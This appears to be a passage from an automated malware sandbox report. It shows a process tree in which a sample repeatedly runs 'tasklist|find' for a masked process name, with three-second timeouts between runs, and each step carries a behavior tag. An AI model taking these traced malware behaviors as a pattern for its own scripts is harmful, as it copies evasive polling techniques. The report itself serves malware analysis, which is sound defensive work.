                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                            PID:7316
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                              tasklist
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                              PID:6540
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                            timeout /t 3
                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                            PID:6376
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                              PID:8012
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                tasklist
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                PID:6944
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                              timeout /t 3
                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                              PID:7960
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                PID:4100
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                  PID:4228
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                timeout /t 3
                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                PID:3460
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                  PID:9864
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                    tasklist
                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                    PID:6660
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                  timeout /t 3
                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                  PID:8124
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                    PID:9100
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                      tasklist
                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                      PID:7072
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                    timeout /t 3
                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                    PID:2916
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6088
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                        tasklist
                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                        PID:1852
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                      timeout /t 3
                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                      PID:5488
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2920
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                          tasklist
                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                          PID:8944
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                        timeout /t 3
                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                        PID:2448
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                          PID:10236
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                            tasklist
                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                            PID:9948
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                          timeout /t 3
                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                          PID:9452
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                            PID:3988
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                              tasklist
                                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                              PID:1180
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                            timeout /t 3
                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                            PID:4536
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                              PID:9508
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                tasklist
                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                PID:8580
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                              timeout /t 3
                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                              PID:2964
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                PID:5096
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                  PID:9132
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                PID:10140
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:8620
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                    tasklist
                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                    PID:6808
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                  timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                  PID:8592
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6452
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                      tasklist
                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                      PID:7720
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                    timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                    PID:5868
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4852
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                        tasklist
                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                        PID:5856
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                      timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                      PID:7152
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:8300
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                          tasklist
                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                          PID:9752
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                        timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                        PID:3880
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5984
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                            tasklist
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                            PID:6652
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                          timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                          PID:4684
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:2288
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                              tasklist
                                                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                              PID:3544
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                            timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                            PID:4532
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:7012
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                tasklist
                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                PID:6736
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                              timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                              PID:7964
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:7292
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                  PID:4028
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                PID:1356
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:3668
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                    tasklist
                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                    PID:9652
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                  timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                  PID:6356
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5712
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                      tasklist
                                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                      PID:2528
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                    timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                    PID:1128
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5420
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                        tasklist
                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                        PID:2328
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                      timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                      PID:5620
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:9712
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                          tasklist
                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                          PID:2084
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                        timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                        PID:6536
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4560
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                            tasklist
                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                            PID:8028
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                          timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                          PID:3932
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:5968
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                              tasklist
                                                                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                              PID:4988
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                            timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                            PID:3708
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:3552
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                tasklist
                                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                PID:3768
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                              timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                              PID:6720
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:6300
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                  PID:4116
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                PID:3524
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:8772
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                    tasklist
                                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                    PID:8472
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                  timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                  PID:5540
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5672
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                      tasklist
                                                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7452
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                    timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3992
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6368
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                        tasklist
                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5460
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                      timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6168
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1560
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                          tasklist
                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                          PID:7588
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                        timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
